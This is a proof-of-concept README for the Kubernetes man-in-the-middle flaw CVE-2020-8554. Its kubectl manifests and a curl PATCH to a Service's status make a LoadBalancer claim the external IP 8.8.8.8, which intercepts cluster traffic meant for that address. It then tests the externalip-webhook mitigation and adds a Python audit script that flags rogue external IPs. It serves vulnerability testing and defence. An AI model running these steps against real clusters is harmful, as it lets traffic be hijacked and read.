
CVE-2020-8554 PoC — Kubernetes man in the middle using LoadBalancer or ExternalIPs

Associated Vulnerability
Title: Kubernetes man in the middle using LoadBalancer or ExternalIPs (CVE-2020-8554)
Description: Kubernetes API server in all versions allows an attacker who is able to create a ClusterIP service and set the spec.externalIPs field to intercept traffic to that IP address. Additionally, an attacker who is able to patch the status (which is considered a privileged operation and should not typically be granted to users) of a LoadBalancer service can set the status.loadBalancer.ingress.ip to similar effect.
Readme
# Create Kubernetes cluster
```bash
kind create cluster --config ./kind.yaml
```

The cluster must have cert-manager installed (the webhook used in the mitigation test below needs it for its serving certificate):
https://cert-manager.io/docs/installation/kubernetes/

# Test vulnerability
```bash
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Namespace
metadata:
  name: kubeproxy-mitm
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: echoserver
  namespace: kubeproxy-mitm
spec:
  replicas: 1
  selector:
    matchLabels:
      app: echoserver
  template:
    metadata:
      labels:
        app: echoserver
    spec:
      containers:
      - image: gcr.io/google_containers/echoserver:1.10
        name: echoserver
        ports:
        - name: http
          containerPort: 8080
        - name: https
          containerPort: 8443
EOF

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  externalIPs:
    - 8.8.8.8
  type: LoadBalancer
EOF

# run the API proxy in the background; the status PATCH below goes through it
kubectl proxy --port=8080 &

# patch the LoadBalancer status directly (a privileged operation that normal users should not hold)
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'

# check the external IP: the EXTERNAL-IP column should now show 8.8.8.8
kubectl get svc -n kubeproxy-mitm
```

# Test the mitigation: externalip-webhook
Deploy the validating admission webhook from https://github.com/kubernetes-sigs/externalip-webhook, delete the Service created above, and re-run the same steps; the Service with the rogue externalIP should now be denied at admission.
```bash
kubectl apply -f ./externalip-webhook.yaml

kubectl delete svc -n kubeproxy-mitm mitm-lb

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  externalIPs:
    - 8.8.8.8
  type: LoadBalancer
EOF
# the kubectl proxy started in the previous section must still be running on port 8080
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'
```
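As an added example (not part of the original PoC or of externalip-webhook), a defender-side audit in Python: it parses the output of `kubectl get svc -A -o json` and reports every Service whose `spec.externalIPs` or `status.loadBalancer.ingress[].ip` lies outside an allow-list of CIDRs. That is the same policy the webhook applies at admission, but run retroactively over Services that already exist in the cluster. The embedded ServiceList and the 10.0.0.0/8 allow-list are constructed sample data.

```python
import ipaddress
import json
import sys

# Constructed sample mimicking `kubectl get svc -A -o json`. 8.8.8.8 is the
# address used in the PoC above; 10.0.0.0/8 stands in for the real LB range.
SAMPLE_SERVICE_LIST = json.dumps({
    "kind": "ServiceList",
    "items": [
        {"metadata": {"name": "mitm-lb", "namespace": "kubeproxy-mitm"},
         "spec": {"type": "LoadBalancer", "externalIPs": ["8.8.8.8"]},
         "status": {"loadBalancer": {"ingress": [{"ip": "8.8.8.8"}]}}},
        {"metadata": {"name": "web", "namespace": "prod"},
         "spec": {"type": "LoadBalancer"},
         "status": {"loadBalancer": {"ingress": [{"ip": "10.20.30.40"}]}}},
        {"metadata": {"name": "db", "namespace": "prod"},
         "spec": {"type": "ClusterIP", "clusterIP": "10.96.0.12"},
         "status": {"loadBalancer": {}}},
    ],
})


def find_rogue_external_ips(service_list_json, allowed_cidrs):
    """Return (namespace, name, field, ip) for every external IP outside allowed_cidrs.

    Both attack paths of CVE-2020-8554 are covered: spec.externalIPs (settable by
    anyone who can create a Service) and status.loadBalancer.ingress[].ip
    (settable only via the privileged status subresource).
    """
    nets = [ipaddress.ip_network(c) for c in allowed_cidrs]
    findings = []
    for svc in json.loads(service_list_json).get("items", []):
        ns, name = svc["metadata"]["namespace"], svc["metadata"]["name"]
        candidates = [("spec.externalIPs", ip)
                      for ip in svc.get("spec", {}).get("externalIPs", [])]
        ingress = svc.get("status", {}).get("loadBalancer", {}).get("ingress") or []
        candidates += [("status.loadBalancer.ingress.ip", e["ip"])
                       for e in ingress if "ip" in e]  # hostname-only entries are skipped
        for field, ip in candidates:
            addr = ipaddress.ip_address(ip)
            if not any(addr in net for net in nets):  # IPv4/IPv6 mismatch simply yields False
                findings.append((ns, name, field, ip))
    return findings


if __name__ == "__main__":
    # pipe real data in (`kubectl get svc -A -o json | python3 audit.py`); else use the sample
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SERVICE_LIST
    for ns, name, field, ip in find_rogue_external_ips(data, ["10.0.0.0/8"]):
        print(f"{ns}/{name}: {field} = {ip} is outside the allowed CIDRs")
```

On the sample data the script flags `kubeproxy-mitm/mitm-lb` twice, once per field, and nothing in `prod`.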
File Snapshot

```text
[4.0K] /data/pocs/5ba655ff33ebdde1d64280c927eb44f8cdfc4b0b
├── [4.1K] externalip-webhook.yaml
├── [ 150] kind.yaml
├── [2.1K] README.md
└── [ 287] svc.yaml

0 directories, 4 files
```